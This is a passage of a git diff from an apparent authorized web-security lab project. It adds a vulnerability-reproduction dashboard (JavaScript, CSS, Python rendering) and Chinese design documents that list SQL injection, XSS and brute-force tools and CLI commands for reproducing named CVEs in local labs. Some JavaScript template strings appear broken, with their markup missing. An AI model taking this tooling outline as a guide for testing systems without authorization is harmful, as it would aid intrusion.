+ if (!response.ok) {
+ throw new Error(`${url} -> ${response.status}`);
+ }
+ return response.json();
+}
+
+async function loadData(preserveSelection = true) {
+ $("syncState").innerHTML = `Refreshing${new Date().toLocaleTimeString()}`;
+ const previousRun = state.selectedRunId;
+ try {
+ const [summary, runs, systems, advisories, profiles] = await Promise.all([
+ fetchJson("./summary.json"),
+ fetchJson("./runs.json"),
+ fetchJson("./systems.json"),
+ fetchJson("./advisories.json"),
+ fetchJson("./profiles.json"),
+ ]);
+ state.summary = summary;
+ state.runs = runs;
+ state.systems = systems;
+ state.advisories = advisories;
+ state.profiles = profiles;
+ hydrateFilterOptions();
+
+ const hashRun = location.hash.startsWith("#run=") ? location.hash.replace("#run=", "") : null;
+ const selectedCandidate = preserveSelection ? (hashRun || previousRun) : hashRun;
+ if (selectedCandidate && runs.some((item) => item.run_id === selectedCandidate)) {
+ state.selectedRunId = selectedCandidate;
+ } else {
+ state.selectedRunId = runs[0]?.run_id || null;
+ }
+
+ renderDashboard();
+ $("syncState").innerHTML = `Live${summary.generated_at || new Date().toISOString()}`;
+ } catch (error) {
+ $("syncState").innerHTML = `Load Failed${escapeHtml(error.message)}`;
+ $("runList").innerHTML = `
${escapeHtml(formatted)}`;
+ } catch (error) {
+ $("artifactViewer").innerHTML = `Artifact load failed: ${escapeHtml(error.message)}`;
+ }
+}
+
+function renderDetail() {
+ const run = state.runs.find((item) => item.run_id === state.selectedRunId);
+ if (!run) {
+ $("detailRoot").innerHTML = `${escapeHtml(advisory.summary || "No summary available.")}
+ +Select a report, log, JSON, screenshot, or timeline file to preview it here.
${escapeHtml(JSON.stringify(run, null, 2))}${escapeHtml(JSON.stringify(advisory, null, 2))}${escapeHtml(JSON.stringify(profile, null, 2))}LAB ONLY | AUTHORIZED TARGETS ONLY | 本地静态看板
- -| System | Total | Verified Real | Verified Synthetic | Blocked | Manual | Browser | Latest |
|---|
面向授权实验场景的本地静态前端。聚合 advisory、run bundle、日志、浏览器证据、失败原因、利用思路与源头信息,并支持可折叠细节与自动刷新。
+| Run | System | Advisory | Status | Mode | Profile | Finished | Artifacts |
|---|
` 方式显示 +- 图片以内联方式展示 +- HTML 报告可 iframe 预览或新窗口打开 + +### 5.4 自动刷新 + +- 默认每 5 秒刷新一次 dashboard JSON +- 用户可以关闭自动刷新 +- 当前正在查看的 artifact 在自动刷新开启时应支持重新抓取 + +### 5.5 失败原因高亮 + +对于 `blocked-*` 和 `triage-manual`: + +- 顶部 hero 要显示状态 pill +- reasoning 面板要显示 failure callout +- 左侧 Recent Failures 要保留最近失败摘要 + +## 6. 展示字段清单 + +### 6.1 Hero 区 + +- run_id +- advisory_id +- advisory title +- verification_status +- verification_mode +- artifact_mode +- system_id +- repro_profile_id +- finished_at + +### 6.2 Timeline 区 + +- `timeline[].at` +- `timeline[].step` +- `timeline[].status` +- `timeline[].detail` + +### 6.3 Reasoning 区 + +- advisory summary +- profile seed messages +- profile attack messages +- profile success criteria +- blocked reason + +### 6.4 Sources 区 + +- official_source_url +- secondary_source_urls +- aliases +- secure_code_topics + +### 6.5 Evidence 区 + +- report.html +- report.md +- timeline.mmd +- bundle json +- compose.yaml +- browser screenshots / DOM / console / network +- request logs +- container logs + +## 7. 动效与视觉要求 + +### 7.1 必须有的视觉增强 + +- 顶部背景渐变和环境光 +- status pill 发光色彩区分 +- 卡片 hover 浮起 +- sticky hero +- 折叠面板开合层次 +- gallery 缩略图点击查看 + +### 7.2 推荐但必须受控 + +- 状态小圆点 pulse +- 背景网格或轻微数据面纹理 +- 面板玻璃感和浅透视阴影 + +### 7.3 不允许 + +- 花哨但影响可读性的动画 +- 大面积纯装饰 3D 效果 +- 自动播放噪音式动效 +- 让日志区难以复制文本的视觉处理 + +## 8. 实时日志与细节查看要求 + +### 8.1 日志查看器 + +日志查看器必须支持: + +- 选中文件后即刻预览 +- JSON 格式化 +- text/json/html/image 四类预览 +- 打开原文件 +- 在自动刷新开启时重新抓取当前文件 + +### 8.2 重点要看的日志 + +- compose / environment 文件 +- baseline / attack / browser json +- container logs +- request logs +- timeline / bundle + +### 8.3 失败排查导向 + +失败时应优先展示: + +- `blocked_reason` +- 当前 step +- 上一个完成 step +- 当前可打开的日志 / 报告 / run bundle +- 对应 advisory 来源与 profile success criteria + +## 9. 数据源契约 + +前端依赖的本地 JSON/文件源: + +- `summary.json` +- `runs.json` +- `systems.json` +- `advisories.json` +- `profiles.json` +- `runs//report.html` +- `runs/ /report.md` +- `runs/ /run.json` +- `runs/ /logs/*` +- `runs/ /assets/*` + +前端不直接写这些数据,只读取并展示。 + +## 10. 落地约束 + +- 保持静态前端,不引入长期运行后端 +- 本地 `serve-dashboard` 即可查看 +- 对于正在跑的 case,前端通过轮询读取新 JSON 实现“近实时” +- 不依赖第三方 CDN UI 库 +- 优先使用原生 HTML/CSS/JS,可长期维护 + +## 11. 验收标准 + +页面完成后,应满足: + +- 能从 run list 切换到 detail panel +- 能折叠与展开各信息区 +- 能打开并预览 JSON / text / image / html artifact +- 能看到失败原因、思路、来源、修复主题 +- 能筛选 system / status / profile +- 能在自动刷新开启时重新载入 dashboard 数据 +- 页面视觉比“普通表格页”更生动,但仍适合高密度阅读 diff --git a/docs/project-features.md b/docs/project-features.md new file mode 100644 index 00000000..78f2ea52 --- /dev/null +++ b/docs/project-features.md @@ -0,0 +1,162 @@ +# 项目功能与特性总览 + +> `LAB ONLY` | `AUTHORIZED TARGETS ONLY` + +## 1. 项目定位 + +`websafe` 是一套“授权攻防实验与研究知识库 + 本地实证系统”。它不是生产安全基线库,也不是面向任意第三方站点的扫描平台。 + +项目覆盖: + +- 本地靶场、Docker 集群、内网实验节点 +- 自建且可公网访问的测试网站、服务器、设备 +- 已明确授权的验证性测试目标 + +项目不覆盖: + +- 无归属证明、无授权的公网资产 +- 公共知名网站 +- 泛互联网画像、枚举、对外大规模探测 + +## 2. 功能版图 + +### 2.1 情报与入库 + +- `08-threat-intel/source-map.yaml` + - 定义系统范围、来源、覆盖策略、输出目录、secure-code 主题 +- `08-threat-intel/repro-map.yaml` + - 定义系统到 repro family、浏览器要求、日志策略和报告模板的映射 +- `08-threat-intel/repro-profiles/` + - family 级和 advisory 级复现说明 +- `08-threat-intel/registry/` + - advisory、system、run、triage 的唯一真值层 +- `08-threat-intel/generated/` + - coverage matrix、latest ingest、dashboard 等人类可读产物 + +### 2.2 本地实证与编排 + +- `00-environments/catalog/` + - 记录系统、镜像、源码、依赖和健康检查的 catalog +- `00-environments/profiles/` + - 记录具体版本或 current profile 的 compose / baseline / seed 参数 +- `scripts/lab/main.py` + - 唯一 lab CLI 入口 +- `scripts/lab/` + - `catalog`, `provision`, `compose`, `seed`, `baseline`, `attack`, `browser`, `evidence`, `render`, `queue`, `validators` + +### 2.3 攻击验证工具 + +- `01-sql-injection/` + - `sqli-scanner.py`, `blind-sqli.py`, `sqli-exploit.go` +- `02-xss/` + - `xss-fuzzer.py`, `xss-scanner.go` +- `03-authentication/` + - `web-brute.py`, `jwt-cracker.py`, `session-lab.py` +- `04-server-security/` + - `port-scanner.py`, `tls-scanner.py`, `site-scope-mapper.py`, `misconfig-lab.py` + +### 2.4 结果展示 + +- `06-case-studies/generated-runs/ /` + - `report.md`, `report.html`, `timeline.mmd`, `assets/`, `logs/` +- `08-threat-intel/generated/dashboard/` + - 静态前端工作台 +- `07-framework-security/` + - 系统级 README、INDEX、案例页,自动显示本地实证状态 + +## 3. 数据流与自动化链路 + +```mermaid +flowchart LR + A["Threat Intel Sources"] --> B["registry/advisories"] + B --> C["repro-map + repro-profiles"] + C --> D["00-environments catalog/profiles"] + D --> E["scripts/lab run-case / run-batch"] + E --> F["generated-runs/ "] + F --> G["registry/runs"] + G --> H["case pages / system INDEX"] + G --> I["dashboard JSON + local UI"] + H --> J["README / docs / PR"] + I --> J +``` + +## 4. 关键特性 + +### 4.1 完整覆盖语义 + +- 每条 advisory 至少进入 `registry/advisories` +- 每条 advisory 必须有明确的实证状态 +- 状态只允许: + - `verified-real` + - `verified-synthetic` + - `blocked-artifact` + - `blocked-destructive` + - `triage-manual` + +### 4.2 浏览器证据强制 + +- XSS、DOM XSS、Token 存储、前端路由绕过、前端配置暴露等浏览器类 case + - 必须生成截图 + - 必须生成 DOM 快照 + - 必须生成 console / network 证据 + - 没有浏览器证据不得升级为 `verified-*` + +### 4.3 受控攻击语义 + +- 默认模式是 `minimal-proof` +- 只读探测、最小化注入、可审计回显、可回滚验证 +- 破坏性利用、越权下载真实数据、不可回滚行为默认禁用 + +### 4.4 双展示面 + +- 静态归档报告 + - 适合证据留存、归档、PR 审阅 +- 本地前端工作台 + - 适合实时查看进度、日志、失败原因、来源、思路、截图和原始 JSON + +### 4.5 自动化提交 + +- `scripts/intel/run-hourly.sh` + - hotlane ingest + hotlane repro +- `scripts/intel/run-nightly.sh` + - 常规 ingest + batch repro + render + validate + PR +- `scripts/intel/run-weekly-reconcile.sh` + - reconcile + retry failures + rerender + validate + PR + +## 5. CLI 能力 + +### 5.1 Intel CLI + +```bash +python3 /Users/x/websafe/scripts/intel/main.py hotlane +python3 /Users/x/websafe/scripts/intel/main.py ingest --since last-success +python3 /Users/x/websafe/scripts/intel/main.py reconcile +python3 /Users/x/websafe/scripts/intel/main.py render +python3 /Users/x/websafe/scripts/intel/main.py validate +python3 /Users/x/websafe/scripts/intel/main.py open-pr --dry-run +``` + +### 5.2 Lab CLI + +```bash +python3 /Users/x/websafe/scripts/lab/main.py catalog sync +python3 /Users/x/websafe/scripts/lab/main.py validate +python3 /Users/x/websafe/scripts/lab/main.py run-case --case gitea--CVE-2025-68939 +python3 /Users/x/websafe/scripts/lab/main.py run-case --case nextjs--CVE-2025-29927 --dry-run +python3 /Users/x/websafe/scripts/lab/main.py run-batch --limit 10 +python3 /Users/x/websafe/scripts/lab/main.py serve-dashboard --port 8734 +``` + +## 6. 前端工作台当前目标 + +前端不只是“一个结果页”,而是本地实验控制台与证据阅读器。它需要: + +- 快速定位系统 / advisory / repro profile +- 折叠与展开 timeline、evidence、sources、raw JSON +- 直接查看 compose、JSON、日志、截图、报告 +- 高亮失败原因、当前 blocker、利用思路、成功判据 +- 自动刷新生成数据,适配正在进行中的本地 run + +详细设计见: + +- [本地前端工作台设计文档](/Users/x/websafe/docs/frontend-dashboard-design.md) diff --git a/scripts/intel/validators.py b/scripts/intel/validators.py index bc40292b..4b082eda 100644 --- a/scripts/intel/validators.py +++ b/scripts/intel/validators.py @@ -84,6 +84,11 @@ def validate(source_map: Dict[str, Any]) -> List[str]: GENERATED_DIR / "dashboard" / "index.html", GENERATED_DIR / "dashboard" / "summary.json", GENERATED_DIR / "dashboard" / "systems.json", + GENERATED_DIR / "dashboard" / "runs.json", + GENERATED_DIR / "dashboard" / "advisories.json", + GENERATED_DIR / "dashboard" / "profiles.json", + GENERATED_DIR / "dashboard" / "assets" / "app.js", + GENERATED_DIR / "dashboard" / "assets" / "styles.css", ROOT / "08-threat-intel" / "registry" / "source-confidence.md", ]: if not path.exists(): diff --git a/scripts/lab/render.py b/scripts/lab/render.py index 3d404d11..d07cd9cf 100644 --- a/scripts/lab/render.py +++ b/scripts/lab/render.py @@ -6,7 +6,8 @@ from pathlib import Path from typing import Any, Dict, List from lab.config import ADVISORIES_DIR, CASE_RUNS_DIR, DASHBOARD_DIR, RUNS_DIR -from lab.utils import ensure_dir, isoformat, load_json_dir, now_utc, write_json, write_text +from lab.repro import load_profiles +from lab.utils import ensure_dir, isoformat, load_json_dir, now_utc, unique, write_json, write_text def mermaid_from_steps(run: Dict[str, Any]) -> str: @@ -41,6 +42,112 @@ def _dashboard_ref(run: Dict[str, Any], ref: str) -> str: return ref +def _artifact_kind(href: str) -> str: + suffix = Path(href).suffix.lower() + if suffix in {".png", ".jpg", ".jpeg", ".gif", ".webp", ".svg"}: + return "image" + if suffix in {".json", ".log", ".txt", ".yaml", ".yml", ".md", ".mmd", ".html"}: + return "text" + return "link" + + +def _artifact_item(run: Dict[str, Any], href: str, label: str | None = None) -> Dict[str, Any]: + return { + "href": href, + "label": label or Path(href).name, + "kind": _artifact_kind(href), + } + + +def _artifact_group(run: Dict[str, Any], key: str, label: str, refs: List[str], use_dashboard_refs: bool = False) -> Dict[str, Any]: + items: List[Dict[str, Any]] = [] + for ref in refs: + href = ref if use_dashboard_refs else _dashboard_ref(run, ref) + items.append(_artifact_item(run, href)) + return { + "key": key, + "label": label, + "count": len(items), + "items": items, + } + + +def _progress_counts(run: Dict[str, Any]) -> Dict[str, int]: + counts = {"completed": 0, "skipped": 0, "failed": 0, "blocked": 0, "planned": 0, "other": 0} + for item in run.get("timeline", []): + status = item.get("status", "other") + if status.startswith("blocked"): + counts["blocked"] += 1 + elif status in counts: + counts[status] += 1 + else: + counts["other"] += 1 + return counts + + +def _advisory_meta(advisory: Dict[str, Any]) -> Dict[str, Any]: + if not advisory: + return {} + return { + "canonical_id": advisory.get("canonical_id"), + "title": advisory.get("title"), + "summary": advisory.get("summary"), + "display_name": advisory.get("display_name"), + "system_id": advisory.get("system_id"), + "category": advisory.get("category"), + "severity": advisory.get("severity"), + "cvss_score": advisory.get("cvss_score"), + "exploit_status": advisory.get("exploit_status"), + "published_at": advisory.get("published_at"), + "updated_at": advisory.get("updated_at"), + "official_source_url": advisory.get("official_source_url"), + "secondary_source_urls": advisory.get("secondary_source_urls", []), + "aliases": advisory.get("aliases", []), + "secure_code_topics": advisory.get("secure_code_topics", []), + "verification_status": advisory.get("verification_status"), + "verification_mode": advisory.get("verification_mode"), + "artifact_mode": advisory.get("artifact_mode"), + "blocked_reason": advisory.get("blocked_reason"), + "browser_evidence": advisory.get("browser_evidence", {}), + } + + +def _profile_meta(profile: Dict[str, Any]) -> Dict[str, Any]: + if not profile: + return {} + return { + "profile_id": profile.get("profile_id"), + "vuln_family": profile.get("vuln_family"), + "provisioning_mode": profile.get("provisioning_mode"), + "destructive_risk": profile.get("destructive_risk"), + "cleanup_policy": profile.get("cleanup_policy"), + "artifact_source": profile.get("artifact_source", {}), + "success_criteria": profile.get("success_criteria", []), + "seed_actions": profile.get("seed_actions", []), + "attack_actions": profile.get("attack_actions", []), + "browser_assertions": profile.get("browser_assertions", {}), + "allowed_target_types": profile.get("allowed_target_types", []), + "required_services": profile.get("required_services", []), + } + + +def _reasoning_lines(advisory: Dict[str, Any], profile: Dict[str, Any]) -> List[str]: + notes: List[str] = [] + if advisory.get("summary"): + notes.append(advisory["summary"]) + for key in ("seed_actions", "attack_actions"): + for item in profile.get(key, []): + message = item.get("message") + if message: + notes.append(message) + for item in profile.get("success_criteria", []): + if item: + notes.append(item) + if advisory.get("blocked_reason"): + notes.append(f"Current blocker: {advisory['blocked_reason']}") + return unique(notes) + + def render_run(run: Dict[str, Any]) -> Dict[str, str]: run_dir = CASE_RUNS_DIR / run["run_id"] ensure_dir(run_dir / "assets") @@ -205,8 +312,12 @@ def render_dashboard() -> Dict[str, str]: ensure_dir(DASHBOARD_DIR) advisory_records = load_json_dir(ADVISORIES_DIR) runs = load_json_dir(RUNS_DIR) + advisory_map = {item["canonical_id"]: item for item in advisory_records if item.get("canonical_id")} + profile_map = load_profiles() runs_dir = DASHBOARD_DIR / "runs" + assets_dir = DASHBOARD_DIR / "assets" ensure_dir(runs_dir) + ensure_dir(assets_dir) for item in runs: bundle_dir = Path(item.get("report_refs", {}).get("bundle_dir", "")) if not bundle_dir.exists(): @@ -265,6 +376,8 @@ def render_dashboard() -> Dict[str, str]: decorated_runs: List[Dict[str, Any]] = [] for item in recent_runs: cloned = dict(item) + advisory = advisory_map.get(item["advisory_id"], {}) + profile = profile_map.get(item["repro_profile_id"], {}) cloned["dashboard_refs"] = { "report_html": f"./runs/{item['run_id']}/report.html", "report_md": f"./runs/{item['run_id']}/report.md", @@ -274,6 +387,29 @@ def render_dashboard() -> Dict[str, str]: cloned["browser_links"] = [_dashboard_ref(item, ref) for ref in item.get("browser_refs", [])] cloned["container_links"] = [_dashboard_ref(item, ref) for ref in item.get("container_log_refs", [])] cloned["request_links"] = [_dashboard_ref(item, ref) for ref in item.get("request_log_refs", [])] + cloned["advisory_meta"] = _advisory_meta(advisory) + cloned["profile_meta"] = _profile_meta(profile) + cloned["reasoning_lines"] = _reasoning_lines(advisory, profile) + cloned["progress"] = _progress_counts(item) + cloned["artifact_groups"] = [ + _artifact_group( + item, + "reports", + "Reports", + [ + cloned["dashboard_refs"]["report_html"], + cloned["dashboard_refs"]["report_md"], + cloned["dashboard_refs"]["timeline"], + cloned["dashboard_refs"]["bundle"], + ], + use_dashboard_refs=True, + ), + _artifact_group(item, "compose", "Compose", item.get("compose_refs", [])), + _artifact_group(item, "browser", "Browser Evidence", item.get("browser_refs", [])), + _artifact_group(item, "container", "Container Logs", item.get("container_log_refs", [])), + _artifact_group(item, "requests", "Request Logs", item.get("request_log_refs", [])), + ] + cloned["artifact_groups"] = [group for group in cloned["artifact_groups"] if group["count"]] decorated_runs.append(cloned) summary = { @@ -292,6 +428,7 @@ def render_dashboard() -> Dict[str, str]: "run_id": item["run_id"], "advisory_id": item["advisory_id"], "status": item.get("verification_status"), + "title": item.get("advisory_meta", {}).get("title"), "blocked_reason": item.get("blocked_reason"), } for item in decorated_runs @@ -300,100 +437,1264 @@ def render_dashboard() -> Dict[str, str]: write_json(DASHBOARD_DIR / "summary.json", summary) write_json(DASHBOARD_DIR / "runs.json", decorated_runs) write_json(DASHBOARD_DIR / "systems.json", summary["systems"]) + write_json(DASHBOARD_DIR / "advisories.json", {key: _advisory_meta(value) for key, value in advisory_map.items()}) + write_json(DASHBOARD_DIR / "profiles.json", {key: _profile_meta(value) for key, value in profile_map.items()}) - html_page = """ - + styles_css = """ +:root { + --bg: #07111f; + --panel: rgba(9, 18, 32, 0.86); + --panel-2: rgba(10, 24, 44, 0.92); + --panel-soft: rgba(18, 32, 56, 0.74); + --border: rgba(137, 171, 214, 0.22); + --text: #f7fafc; + --muted: #9fb3ca; + --accent: #5eead4; + --accent-2: #ffb86b; + --accent-3: #90cdf4; + --danger: #ff7b7b; + --warning: #ffd166; + --success: #6ee7a5; + --shadow: 0 24px 80px rgba(1, 7, 20, 0.45); + --radius: 20px; +} + +* { box-sizing: border-box; } +html, body { margin: 0; min-height: 100%; } +body { + font-family: "IBM Plex Sans", "Avenir Next", "Segoe UI", sans-serif; + background: + radial-gradient(circle at top left, rgba(94, 234, 212, 0.15), transparent 28%), + radial-gradient(circle at top right, rgba(255, 184, 107, 0.18), transparent 22%), + linear-gradient(145deg, #050c16 0%, #08111f 44%, #0d1c31 100%); + color: var(--text); + overflow-x: hidden; +} + +body::before { + content: ""; + position: fixed; + inset: 0; + pointer-events: none; + background-image: + linear-gradient(rgba(255,255,255,0.03) 1px, transparent 1px), + linear-gradient(90deg, rgba(255,255,255,0.03) 1px, transparent 1px); + background-size: 32px 32px; + mask-image: radial-gradient(circle at center, black 36%, transparent 78%); + opacity: 0.28; +} + +a { color: var(--accent); text-decoration: none; } +a:hover { text-decoration: underline; } +button, input, select { + font: inherit; +} + +.dashboard-shell { + position: relative; + max-width: 1640px; + margin: 0 auto; + padding: 32px 24px 40px; +} + +.hero { + position: sticky; + top: 0; + z-index: 20; + backdrop-filter: blur(18px); + background: linear-gradient(180deg, rgba(7, 17, 31, 0.94), rgba(7, 17, 31, 0.75)); + border: 1px solid var(--border); + border-radius: 28px; + padding: 24px 24px 20px; + box-shadow: var(--shadow); +} + +.hero-grid { + display: grid; + grid-template-columns: 1.6fr 1fr; + gap: 20px; + align-items: start; +} + +.eyebrow { + display: inline-flex; + align-items: center; + gap: 8px; + color: var(--muted); + font-size: 0.88rem; + letter-spacing: 0.12em; + text-transform: uppercase; +} + +.eyebrow::before { + content: ""; + width: 10px; + height: 10px; + border-radius: 999px; + background: radial-gradient(circle, var(--accent), rgba(94, 234, 212, 0.15)); + box-shadow: 0 0 24px rgba(94, 234, 212, 0.8); + animation: pulse 2.8s ease-in-out infinite; +} + +.hero h1 { + margin: 12px 0 10px; + font-family: "IBM Plex Serif", "Iowan Old Style", Georgia, serif; + font-size: clamp(2rem, 4vw, 3.5rem); + line-height: 1.02; +} + +.hero p { + margin: 0; + color: var(--muted); + max-width: 74ch; +} + +.hero-actions { + display: flex; + flex-wrap: wrap; + gap: 12px; + margin-top: 18px; +} + +.chip, .ghost-chip { + display: inline-flex; + align-items: center; + justify-content: center; + gap: 8px; + border-radius: 999px; + border: 1px solid var(--border); + padding: 10px 14px; + background: rgba(255,255,255,0.06); + color: var(--text); +} + +.ghost-chip { + background: rgba(255,255,255,0.04); +} + +.hero-meta { + display: grid; + grid-template-columns: repeat(2, minmax(0, 1fr)); + gap: 14px; +} + +.meta-card, .glass-panel { + background: var(--panel); + border: 1px solid var(--border); + border-radius: var(--radius); + box-shadow: var(--shadow); +} + +.meta-card { + padding: 18px; + min-height: 116px; +} + +.meta-card strong { + display: block; + color: var(--muted); + font-size: 0.84rem; + letter-spacing: 0.08em; + text-transform: uppercase; +} + +.meta-card span { + display: block; + margin-top: 10px; + font-size: 2rem; + font-weight: 700; +} + +.workspace { + display: grid; + grid-template-columns: 420px minmax(0, 1fr); + gap: 20px; + margin-top: 22px; +} + +.sidebar { + display: flex; + flex-direction: column; + gap: 18px; +} + +.panel-header { + display: flex; + align-items: center; + justify-content: space-between; + gap: 12px; + margin-bottom: 16px; +} + +.panel-header h2, .panel-header h3 { + margin: 0; + font-size: 1rem; + letter-spacing: 0.04em; + text-transform: uppercase; + color: var(--muted); +} + +.glass-panel { + padding: 18px; + background: + linear-gradient(180deg, rgba(255,255,255,0.04), transparent 35%), + var(--panel); +} + +.filters { + display: grid; + gap: 12px; +} + +.filters label { + display: grid; + gap: 6px; + color: var(--muted); + font-size: 0.9rem; +} + +.filters input, .filters select { + width: 100%; + background: rgba(255,255,255,0.05); + color: var(--text); + border: 1px solid rgba(159, 179, 202, 0.18); + border-radius: 14px; + padding: 12px 14px; +} + +.run-list { + display: grid; + gap: 12px; + max-height: calc(100vh - 460px); + overflow: auto; + padding-right: 4px; +} + +.run-card { + width: 100%; + text-align: left; + padding: 16px; + border-radius: 18px; + border: 1px solid rgba(159, 179, 202, 0.14); + background: linear-gradient(180deg, rgba(255,255,255,0.05), rgba(255,255,255,0.03)); + color: var(--text); + cursor: pointer; + transition: transform 180ms ease, border-color 180ms ease, background 180ms ease; +} + +.run-card:hover, .run-card.is-active { + transform: translateY(-1px); + border-color: rgba(94, 234, 212, 0.42); + background: linear-gradient(180deg, rgba(94, 234, 212, 0.14), rgba(255,255,255,0.05)); +} + +.run-card-top, .flex-row { + display: flex; + align-items: center; + justify-content: space-between; + gap: 12px; +} + +.run-card h4 { + margin: 10px 0 8px; + font-size: 1rem; + line-height: 1.35; +} + +.mini-muted { + color: var(--muted); + font-size: 0.86rem; +} + +.status-pill { + display: inline-flex; + align-items: center; + gap: 7px; + border-radius: 999px; + padding: 6px 10px; + font-size: 0.82rem; + font-weight: 700; + text-transform: uppercase; + letter-spacing: 0.06em; + border: 1px solid transparent; +} + +.status-pill::before { + content: ""; + width: 8px; + height: 8px; + border-radius: 999px; + background: currentColor; + box-shadow: 0 0 16px currentColor; +} + +.status-blocked-artifact, .status-blocked-destructive { + color: var(--danger); + background: rgba(255, 123, 123, 0.14); + border-color: rgba(255, 123, 123, 0.24); +} + +.status-triage-manual, .status-suspected { + color: var(--warning); + background: rgba(255, 209, 102, 0.14); + border-color: rgba(255, 209, 102, 0.24); +} + +.status-verified-real { + color: var(--success); + background: rgba(110, 231, 165, 0.14); + border-color: rgba(110, 231, 165, 0.24); +} + +.status-verified-synthetic { + color: var(--accent-3); + background: rgba(144, 205, 244, 0.14); + border-color: rgba(144, 205, 244, 0.24); +} + +.status-default { + color: var(--accent); + background: rgba(94, 234, 212, 0.14); + border-color: rgba(94, 234, 212, 0.24); +} + +.detail-view { + display: grid; + gap: 18px; +} + +.detail-hero { + padding: 22px; + overflow: hidden; + position: relative; +} + +.detail-hero::after { + content: ""; + position: absolute; + inset: auto -20% -55% 25%; + height: 220px; + background: radial-gradient(circle, rgba(94, 234, 212, 0.2), transparent 55%); + pointer-events: none; +} + +.detail-headline { + margin: 8px 0 12px; + font-family: "IBM Plex Serif", "Iowan Old Style", Georgia, serif; + font-size: clamp(1.6rem, 3vw, 2.8rem); + line-height: 1.08; +} + +.tag-row, .link-row, .artifact-row { + display: flex; + flex-wrap: wrap; + gap: 10px; +} + +.tag { + display: inline-flex; + align-items: center; + padding: 7px 10px; + border-radius: 999px; + background: rgba(255,255,255,0.06); + border: 1px solid rgba(159, 179, 202, 0.18); + color: var(--text); + font-size: 0.86rem; +} + +.stat-grid { + display: grid; + grid-template-columns: repeat(4, minmax(0, 1fr)); + gap: 12px; + margin-top: 18px; +} + +.stat-card { + padding: 14px; + border-radius: 16px; + background: rgba(255,255,255,0.04); + border: 1px solid rgba(159, 179, 202, 0.16); +} + +.stat-card strong { + display: block; + color: var(--muted); + font-size: 0.78rem; + text-transform: uppercase; + letter-spacing: 0.08em; +} + +.stat-card span { + display: block; + margin-top: 10px; + font-size: 1.15rem; + font-weight: 700; +} + +.detail-grid { + display: grid; + grid-template-columns: minmax(0, 1fr) 360px; + gap: 18px; +} + +.stack { + display: grid; + gap: 18px; +} + +.accordion { + overflow: hidden; +} + +.accordion > summary { + list-style: none; + cursor: pointer; + padding: 18px 20px; + display: flex; + align-items: center; + justify-content: space-between; + gap: 12px; +} + +.accordion > summary::-webkit-details-marker { display: none; } +.accordion > summary span { + font-size: 1rem; + text-transform: uppercase; + letter-spacing: 0.08em; + color: var(--muted); +} + +.accordion .accordion-content { + padding: 0 20px 20px; + border-top: 1px solid rgba(159, 179, 202, 0.12); +} + +.timeline-list { + display: grid; + gap: 12px; +} + +.timeline-item { + display: grid; + grid-template-columns: 120px 180px minmax(0, 1fr); + gap: 12px; + padding: 12px 0; + border-bottom: 1px solid rgba(159, 179, 202, 0.12); +} + +.timeline-item:last-child { + border-bottom: 0; +} + +.timeline-step { + font-weight: 700; +} + +.artifact-group { + margin-bottom: 14px; +} + +.artifact-group h4 { + margin: 0 0 10px; + color: var(--muted); + font-size: 0.88rem; + text-transform: uppercase; + letter-spacing: 0.08em; +} + +.artifact-button { + display: inline-flex; + align-items: center; + gap: 8px; + margin: 0 10px 10px 0; + padding: 10px 12px; + border-radius: 14px; + border: 1px solid rgba(159, 179, 202, 0.16); + background: rgba(255,255,255,0.05); + color: var(--text); + cursor: pointer; +} + +.artifact-button:hover, .artifact-button.is-active { + border-color: rgba(94, 234, 212, 0.4); + background: rgba(94, 234, 212, 0.12); +} + +.log-viewer { + min-height: 420px; + display: grid; + gap: 14px; +} + +.viewer-toolbar { + display: flex; + flex-wrap: wrap; + justify-content: space-between; + gap: 10px; + align-items: center; +} + +.viewer-frame { + background: rgba(2, 8, 22, 0.88); + border: 1px solid rgba(159, 179, 202, 0.18); + border-radius: 16px; + min-height: 300px; + overflow: hidden; +} + +.viewer-frame pre { + margin: 0; + padding: 18px; + max-height: 560px; + overflow: auto; + font-family: "IBM Plex Mono", "SFMono-Regular", "Menlo", monospace; + font-size: 0.88rem; + line-height: 1.6; + color: #d6e5f5; + white-space: pre-wrap; +} + +.viewer-frame img { + display: block; + width: 100%; + height: auto; +} + +.gallery { + display: grid; + grid-template-columns: repeat(auto-fit, minmax(220px, 1fr)); + gap: 14px; +} + +.gallery button { + all: unset; + cursor: pointer; + border-radius: 18px; + overflow: hidden; + border: 1px solid rgba(159, 179, 202, 0.18); + background: rgba(255,255,255,0.04); +} + +.gallery img { + display: block; + width: 100%; + aspect-ratio: 4 / 3; + object-fit: cover; +} + +.gallery figcaption { + padding: 10px 12px 14px; + color: var(--muted); + font-size: 0.84rem; +} + +.failure-callout { + padding: 16px 18px; + border-radius: 18px; + border: 1px solid rgba(255, 123, 123, 0.2); + background: rgba(255, 123, 123, 0.09); +} + +.json-block { + background: rgba(2, 8, 22, 0.72); + border-radius: 16px; + border: 1px solid rgba(159, 179, 202, 0.14); + padding: 16px; + overflow: auto; + font-family: "IBM Plex Mono", "SFMono-Regular", monospace; + font-size: 0.84rem; + line-height: 1.55; + color: #c9d8e8; +} + +.empty-state { + padding: 40px 24px; + text-align: center; + color: var(--muted); +} + +.failure-feed { + display: grid; + gap: 10px; +} + +.failure-item { + padding: 12px 14px; + border-radius: 16px; + background: rgba(255,255,255,0.04); + border: 1px solid rgba(159, 179, 202, 0.16); +} + +.system-grid { + display: grid; + gap: 10px; +} + +.system-card { + padding: 14px 16px; + border-radius: 16px; + background: rgba(255,255,255,0.04); + border: 1px solid rgba(159, 179, 202, 0.14); +} + +.meter { + position: relative; + height: 10px; + border-radius: 999px; + background: rgba(255,255,255,0.08); + overflow: hidden; + margin-top: 10px; +} + +.meter > span { + position: absolute; + inset: 0 auto 0 0; + width: var(--fill, 0%); + background: linear-gradient(90deg, var(--accent), var(--accent-2)); + border-radius: inherit; +} + +.sync-indicator { + display: inline-flex; + align-items: center; + gap: 8px; +} + +.sync-indicator strong { + color: var(--text); +} + +.dot { + width: 10px; + height: 10px; + border-radius: 999px; + background: var(--accent); + box-shadow: 0 0 18px rgba(94, 234, 212, 0.8); +} + +@keyframes pulse { + 0%, 100% { transform: scale(1); opacity: 0.88; } + 50% { transform: scale(1.35); opacity: 1; } +} + +@media (max-width: 1280px) { + .workspace, .detail-grid, .hero-grid { + grid-template-columns: 1fr; + } + + .stat-grid { + grid-template-columns: repeat(2, minmax(0, 1fr)); + } +} + +@media (max-width: 760px) { + .dashboard-shell { + padding: 18px 14px 32px; + } + + .hero { + position: static; + } + + .stat-grid, .hero-meta { + grid-template-columns: 1fr; + } + + .timeline-item { + grid-template-columns: 1fr; + } +} +""" + write_text(assets_dir / "styles.css", 